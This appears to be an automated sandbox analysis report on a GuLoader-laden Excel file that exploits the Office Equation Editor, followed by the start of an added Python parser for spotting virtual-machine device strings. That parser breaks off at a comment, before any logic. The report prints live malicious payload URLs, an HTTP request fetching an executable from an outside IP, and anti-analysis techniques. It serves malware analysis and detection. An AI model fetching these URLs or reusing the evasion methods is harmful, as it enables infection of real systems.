Windows Analysis Report
TransportLabel_6170453602.xlsx

Overview

General Information

Sample Name: TransportLabel_6170453602.xlsx
Analysis ID: 624947
MD5: 1db66b406376f18434e1c02cbcf5c5e5
SHA1: 35741ca39d0d76a00fac1eaa720101d7bfd82cc5
SHA256: a561efadb6bab1e3d4f5b0cdefaecc0c4afb382bfe3bde81e1dad0aefc76695c
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
PE file contains more sections than normal
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2452 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2644 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2156 cmdline: "C:\Users\Public\vbc.exe" MD5: D5E55A57372BCAD45FBB260105179CAF)
  • cleanup
{"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}

Source | Rule | Description | Author | Strings
00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

    Exploits

    Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.149.13.182, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2644, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2644, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
    No Snort rule has matched

    AV Detection

    Source: 00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}
    Source: TransportLabel_6170453602.xlsx | ReversingLabs: Detection: 39%
    Source: http://103.149.13.182/msdrive10/.svchost.exe | Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | Metadefender: Detection: 14%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | ReversingLabs: Detection: 23%

    Exploits

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 103.149.13.182 Port: 80
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb | source: AsSQLHelper.dll.4.dr
    Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb | source: AEGISIIINVHelper.dll.4.dr
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406850 FindFirstFileW,FindClose,4_2_00406850
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C26
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040290B FindFirstFileW,4_2_0040290B

    Software Vulnerabilities

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0357051B ShellExecuteExW,ExitProcess,2_2_0357051B
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03570435
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035704BA URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035704BA
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035703C5 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035703C5
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0357044F URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_0357044F
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03570390 ExitProcess,2_2_03570390
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03570504 ShellExecuteExW,ExitProcess,2_2_03570504
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03570539 ExitProcess,2_2_03570539
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035703A9 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035703A9
    Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80
    Source: excel.exe | Memory has grown: Private usage: 8MB later: 62MB

    Networking

    Source: Malware configuration extractor | URLs: http://barsam.com.au/bin_QuCucbUMda229.bin
    Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 200 OK
        Date: Thu, 12 May 2022 07:27:56 GMT
        Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
        Last-Modified: Tue, 10 May 2022 23:41:34 GMT
        ETag: "4fcbf-5deb0dd783b2f"
        Accept-Ranges: bytes
        Content-Length: 326847
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
    Source: global traffic | HTTP traffic detected:
        GET /msdrive10/.svchost.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 103.149.13.182
        Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03570435
    Source: unknown | TCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exe
    Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exeigh
    Source: EQNEDT32.EXE, 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exej
    Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exemmC:
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://crl.globalsign.com/root.crl0G
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
    Source: EQNEDT32.EXE, 00000002.00000002.957995043.0000000000602000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.957102265.000000000040A000.00000008.00000001.01000000.00000004.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://ocsp.digicert.com0C
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://ocsp.digicert.com0O
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://ocsp.globalsign.com/rootr103
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr | String found in binary or memory: http://ocsp.sectigo.com0
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: http://www.digicert.com/CPS0
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr | String found in binary or memory: https://sectigo.com/CPS0C
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: https://www.digicert.com/CPS0
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr | String found in binary or memory: https://www.globalsign.com/repository/0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE386947.emf
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_004056BB

    System Summary

    Source: Screenshot number: 8 | Screenshot OCR: document is protected 17 18 ~ 19 20 ~ m p 21 e m m 22 23 0 , G) Open the document In If thi
    Source: Screenshot number: 8 | Screenshot OCR: protected documents the yellow bar above 26 27 28 0 q 29 Nr g I , )) -: .- .b > " 35 36
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040350A
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_734F1BFF 4_2_734F1BFF
    Source: C:\Users\Public\vbc.exe | Process Stats: CPU usage > 98%
    Source: .svchost[1].exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: wxbase30u_xml_gcc_custom.dll.4.dr | Static PE information: Number of sections : 12 > 10
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77620000 page execute and read and write
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77740000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 77620000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 77740000 page execute and read and write
    Source: TransportLabel_6170453602.xlsx | ReversingLabs: Detection: 39%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$TransportLabel_6170453602.xlsx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR581D.tmp
    Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@4/26@0/1
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_004021AA CoCreateInstance,4_2_004021AA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_00404967
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb | source: AsSQLHelper.dll.4.dr
    Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb | source: AEGISIIINVHelper.dll.4.dr

    Data Obfuscation

    Source: Yara match | File source: 00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_734F30C0 push eax; ret 4_2_734F30EE
    Source: wxbase30u_xml_gcc_custom.dll.4.dr | Static PE information: section name: .xdata
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_734F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_734F1BFF
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll
    Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
    Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll
    Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03570435

    Boot Survival

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000003A50A78 second address: 0000000003A50A78 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FB704D0F74Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2532Thread sleep time: -240000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406850 FindFirstFileW,FindClose,4_2_00406850
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C26
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2206
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2235
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2255
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2209
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2305
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2308
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-4648
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-4804
    Source: EQNEDT32.EXE, 00000002.00000002.957995043.0000000000602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}H
    Source: vbc.exe, 00000004.00000002.1159159152.00000000009C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_734F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_734F1BFF
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570540 mov edx, dword ptr fs:[00000030h]2_2_03570540
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040350A
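
The device-interface strings found in the memory of EQNEDT32.EXE and vbc.exe above are the kind of artifact an evasive loader compares against a vendor list: a VMware SATA CD-ROM identifies the host as a virtual machine as surely as an RDTSC timing loop does. The parser below is an added example for this report, not Joe Sandbox code and not code recovered from the sample. It takes the two strings exactly as reported, splits each path into enumerator, device id, instance id and interface-class GUID, decodes the IDE device id (type, 40-character ATA model, 8-character revision, spaces replaced by underscores) and flags hypervisor vendors. The three storage interface-class GUIDs are from the Windows SDK; the vendor marker list is this example's assumption.

```python
"""Parse Windows device-interface paths from memory strings and flag hypervisor hardware.

Added example for this report (not Joe Sandbox code). A device-interface path looks like
\\?\<enumerator>#<device id>#<instance id>#{<interface class GUID>}. For the IDE enumerator
the device id is <type><40-char ATA model><8-char firmware revision>, space-padded with the
spaces replaced by underscores, which is why the VMware CD-ROM appears as
"CdRomNECVMWar_VMware_SATA_CD01_______________1.00____". The GUID table is from the Windows
SDK storage interface classes; HYPERVISOR_MARKERS is this example's assumption.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

INTERFACE_CLASSES = {
    "{53f56307-b6bf-11d0-94f2-00a0c91efb8b}": "GUID_DEVINTERFACE_DISK",
    "{53f56308-b6bf-11d0-94f2-00a0c91efb8b}": "GUID_DEVINTERFACE_CDROM",
    "{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}": "GUID_DEVINTERFACE_VOLUME",
}
# Model fragments that betray an emulated disk or CD-ROM (assumed list, compared upper-case).
HYPERVISOR_MARKERS = ("VMWARE", "VMWAR", "VBOX", "QEMU", "XEN", "VIRTUAL", "PARALLELS")
IDE_DEVICE_TYPES = ("CdRom", "Disk", "Tape", "Changer", "Other")

# Accept the Win32 (\\?\), NT (\??\) and truncated (??\) prefixes that string carving yields.
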